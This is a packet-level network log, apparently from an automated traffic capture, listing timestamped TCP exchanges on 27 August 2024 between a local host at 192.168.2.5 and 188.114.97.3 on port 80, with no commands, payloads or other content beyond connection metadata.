                              Aug 27, 2024 09:48:58.656759977 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.656770945 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.656785011 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.656794071 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.656800032 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.656804085 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.656824112 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.656851053 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.657033920 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.657042980 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.657052040 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.657063007 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.657078981 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.657078981 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.657088995 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.657093048 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.657099009 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.657115936 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.657116890 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.657128096 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.657136917 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.657140970 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.657147884 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.657157898 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.657170057 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.657177925 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.657179117 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.657196045 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.657217979 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.657510042 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.657521009 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.657531023 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.657547951 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.657552004 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.657560110 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.657568932 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.657576084 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.657581091 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.657591105 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.657602072 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.657604933 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.657615900 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.657620907 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.657628059 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.657638073 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.657639027 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.657643080 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.657655001 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.657665014 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.657684088 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.657710075 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.698108912 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.698154926 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.698164940 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.698245049 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.698256016 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.698265076 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.698276997 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.698308945 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.698308945 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.698417902 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.741111994 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.741122961 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.741132021 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.741169930 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.741180897 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.741192102 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.741235971 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.741261005 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.741276026 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.741288900 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.741300106 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.741314888 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.741316080 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.741358042 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.741395950 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.741408110 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.741420031 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.741430044 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.741445065 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.741457939 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.741589069 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.741600037 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.741611004 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.741622925 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.741632938 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.741633892 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.741646051 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.741657019 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.741662025 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.741667986 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.741683006 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.741693974 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.743768930 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.743781090 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.743793011 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.743824959 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.743844032 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.743885994 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.743896961 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.743908882 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.743930101 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.743942022 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.743968964 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.744004011 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.744035006 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.744045973 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.744087934 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.744565964 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.744580030 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.744590044 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.744620085 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.744638920 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.744638920 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.744651079 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.744667053 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.744678020 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.744690895 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.744699001 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.744716883 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.744788885 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.744801044 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.744811058 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.744821072 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.744832993 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.744841099 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.744843960 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.744857073 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.744863987 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.744869947 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.744880915 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.744893074 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.744894028 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.744904995 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.744925976 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.744944096 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.744993925 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.745151997 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.745165110 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.745174885 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.745187044 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.745198965 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.745199919 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.745212078 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.745223999 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.745223999 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.745235920 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.745249033 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.745260000 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.745263100 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.745273113 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.745285034 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.745294094 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.745296001 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.745304108 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.745306969 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.745320082 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.745352983 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.745523930 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.745534897 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.745547056 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.745565891 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.745577097 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.745584011 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.745588064 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.745599985 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.745609999 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.745615959 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.745628119 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.745640039 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.745640039 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.745652914 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.745663881 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.745663881 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.745676041 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.745681047 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.745687008 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.745699883 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.745704889 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.745727062 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.746035099 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.746047020 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.746058941 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.746073961 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.746082067 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.746104956 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.746228933 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.746239901 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.746258020 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.746269941 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.746282101 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.746282101 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.746294022 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.746300936 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.746305943 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.746318102 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.746318102 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.746330976 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.746342897 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.746346951 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.746355057 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.746366978 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.746376038 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.746378899 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.746390104 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.746392012 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.746401072 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.746408939 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.746413946 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.746427059 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.746433020 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.746438980 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.746449947 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.746464014 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.746478081 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.746501923 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.746743917 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.746757984 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.746767998 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.746783018 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.746810913 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.786927938 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.786940098 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.786951065 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.786961079 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.786972046 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.786982059 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.786993027 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.787028074 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.787065029 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.829940081 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.829966068 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.829978943 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.830007076 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.830027103 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.830039978 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.830049992 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.830060959 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.830065012 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.830080032 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.830092907 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.830104113 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.830113888 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.830126047 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.830137968 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.830138922 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.830151081 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.830161095 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.830172062 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.830174923 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.830174923 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.830214024 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.830326080 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.830351114 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.830365896 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.830368996 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.830394030 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.830418110 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.832350016 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.832370996 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.832382917 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.832392931 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.832400084 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.832405090 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.832422972 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.832449913 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.832458973 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.832470894 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.832485914 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.832505941 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.832608938 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.832653046 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.832669973 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.832711935 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.832753897 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.832782030 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.832792997 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.832806110 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.832834005 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.832839966 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.832849979 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.832890034 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.832925081 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.832936049 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.832946062 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.832957029 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.832963943 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.832971096 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.832988024 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.833014965 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.833045006 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.833056927 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.833095074 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.833097935 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.833103895 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.833138943 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.833193064 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.833204031 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.833214998 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.833225965 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.833237886 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.833260059 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.833287954 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.833333015 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.833344936 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.833355904 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.833367109 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.833376884 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.833379984 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.833401918 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.833434105 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.833499908 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.833511114 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.833522081 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.833533049 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.833543062 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.833549023 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.833579063 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.833647013 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.833657980 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.833667994 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.833678961 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.833693981 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.833695889 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.833705902 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.833718061 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.833741903 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.833942890 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.833954096 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.833962917 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.833972931 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.833983898 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.833992004 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.833995104 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.834006071 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.834012032 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.834017992 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.834028959 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.834029913 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.834043980 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.834052086 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.834054947 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.834067106 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.834070921 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.834098101 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.834243059 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.834254980 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.834270954 CEST8061383188.114.97.3192.168.2.5
